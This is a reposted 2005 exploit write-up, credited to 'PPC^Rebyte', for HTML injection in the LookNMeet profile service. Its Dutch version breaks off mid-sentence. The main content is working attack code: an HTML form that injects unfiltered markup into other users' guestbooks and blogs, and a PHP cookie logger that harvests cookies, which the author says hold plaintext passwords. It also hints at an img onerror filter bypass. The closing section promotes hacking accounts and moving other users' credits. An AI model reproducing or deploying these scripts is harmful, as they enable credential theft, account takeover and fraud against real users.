[转载]LOOKNMEET HTML INJECT EXPLOIT
文章作者:PPC^Rebyte*** SEE BELOW FOR DUTCH VERSION ***
*** NEDERLANDSE VERSIE ONDERAAN ***
( ENGLISH VERSION )
*** Status
__________
The vendor (AfterTheHype) is informed about this bug by Rebyte security
on 04 march 2005. Expect updated service soon.
1* Intro
________
LookNMeet is a service from vender AfterTheHype to make your own profile
and to meet new people.
A bug in the service makes it possible to inject your own HTML code in
someone's guestbook or in your own blog, which makes it possible for you
to make your blog or someone's guestbook really special because you can
inject HTML to your likings. It should also be possible to steal someone's
password because the passwords are stored in plain text in a cookie.
Former misuse of the bug caused LookNMeet to patch their service, but not
fully. You can still inject HTML code, but you can't -directly- inject
<script> or <iframe> tags anymore, but of course there are ways to work
around this...
Following: an article about how we hacked LookNMeet profiles and made
our blog and guestbook messages really special
2* Writing HTML Injection Script
________________________________
A simple HTML script with the use of forms is sufficient to inject pure HTML
into LookNMeet.
Example Script:
- - - - - - - -
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
-- LNMinject.html --
<html>
<head>
<title>LookNMeet HTML InjectoR * by PPC</title>
</head>
<body>
<b><font size="5" color="#FF0000">LookNMeet HTML InjectoR Xploit</font><br />
- by PPC -</b>
<br /><br /><font color="#888888">Warning: You have to be logged in to
LookNMeet and have Cookies enabled to use this xploit.</font>
<!-- FORM TO SIGN GUESTBOOK -->
<form action="[url]http://www.looknmeet.be/members/gbook_sign.html[/url]" method="post">
<input type="hidden" name="submitted" value="true">
<input type="hidden" name="return" value="">
<table border="0">
<tr>
<td>
<hr align="left" width="550" /><b><font size="5">Inject To Guestbook</font>
</b><br /><br />
</td>
</tr>
<tr>
<td>
<!-- "LOOKID" HAS THE UNIQUE GUESTBOOK USER ID OF THE GUESTBOOK
WHERE WE WANT TO INJECT OUR HTML TO -->
Guestbook User ID: <input type="text" name="lookid" value=""
maxlength="100" size="50"><br />
Title: <input type="text" name="title" value="" maxlength="100" size="50">
<br /><br />HTML Code:<br />
<!-- "DESCR" IS THE HTMLCODE THAT WOULD -NORMALLY- GET FILTERED -->
<textarea wrap=soft NAME="descr" ROWS=10 COLS=60></TEXTAREA> </td>
</tr>
<tr>
<td colspan="2">
<!-- WE CAN USE A 'REAL TEXT EDITOR' -
(NEEDED TO INJECT HTML) -->
<input type="hidden" name="RTEavailable" value="yes">
</tr>
<tr>
<td colspan="2"> </td>
</tr>
<tr>
<td>
<input type="submit" name="cancel" value=" Annuleren ">
<input type="submit" name="finish" value=" Invoegen ">
</td>
</tr>
<tr>
</tr>
</table>
</form>
</td>
</tr>
</table>
<!-- FORM TO WRITE INTO BLOG -->
<form action="[url]http://www.looknmeet.be/owner/blog_add.html[/url]" method="post">
<input type="hidden" name="submitted" value="true">
<input type="hidden" name="return" value="">
<table border="0">
<tr>
<td>
<hr align="left" width="550" /><b><font size="5">Inject To Blog</font>
</b><br />
</font><br />
Mood: <select name="moodid">
<option value="0" selected>Neutral</option>
<option value="1" >Sad</option>
<option value="2" >Happy</option>
<option value="3" >Mad</option>
</td>
</tr>
<tr>
<td>Title: <input type="text" name="title" value="" maxlength="100"
size="50"><br /><br />HTML Code:<br />
<!-- "DESCR" IS THE HTMLCODE THAT WOULD -NORMALLY- GET FILTERED -->
<textarea wrap=soft NAME="descr" ROWS=10 COLS=60></TEXTAREA> </td>
</tr>
<tr>
<td colspan="2">
<!-- WE CAN USE A 'REAL TEXT EDITOR' -
(NEEDED TO INJECT HTML) -->
<input type="hidden" name="RTEavailable" value="yes">
</tr>
<tr>
<td colspan="2"> </td>
</tr>
<tr>
<td>
<input type="submit" name="cancel" value=" Cancel ">
<input type="submit" name="finish" value=" Inject ">
</td>
</tr>
<tr>
</tr>
</table>
</form>
</td>
</tr>
</table>
</body>
</html>
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
3* Injecting Basic HTML
_______________________
Now you can inject simple HTML code by using your new HTML-written exploit.
Just open the page you made and fill in the HTML code
4* Stealing Cookies (passwords)
_______________________________
All LookNMeet users' password is stored as plaintext in a cookie. By using a
little script we should be able to write this cookie to a textfile...
We could make a PHP file that logs the cookie of users who visit your blog
or a guestbook and which stores the cookie in a text file. In order to do this
we would need the following file:
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
-- log.php --
<title>x</title>
<?
echo $log;
$log = $log . "\n";
$fp=fopen("file.txt","a+");
fputs($fp,$log);
fclose($fp);
?>
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
And we make a new empty file and name it "file.txt".
We also give "file.txt" all write and read access so there will be no problems
when writing data to it (CHMOD 777).
Now we have to inject a code into LookNMeet that passes on the cookie to
"log.php". Since LNM has already integrated better filtering by blocking
<script> and <iframe> tags, it has become harder to write a working script,
but by trying out things you should be able to write one anyway.
(Try to f*ck around with <img src="re.byte" onerror="JAVASCRIPT" />)
You now have the password of everyone who visits the page you injected
the code to in "file.txt"
5* Outro
________
THE.END
you can use this exploit to
- make your pages stand out by using pure HTML
* - hack LNM accounts
* - transfer credits from someone's account to yours
Greetings 2 everyone at Rebyte and the whole Belgian scene !!
-- PPC^Rebyte --
-- ppc respected as --
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
( NEDERLANDSE VERSIE )
*** Status
__________
De uitgever (AfterTheHype) is over deze bug ge
页:
[1]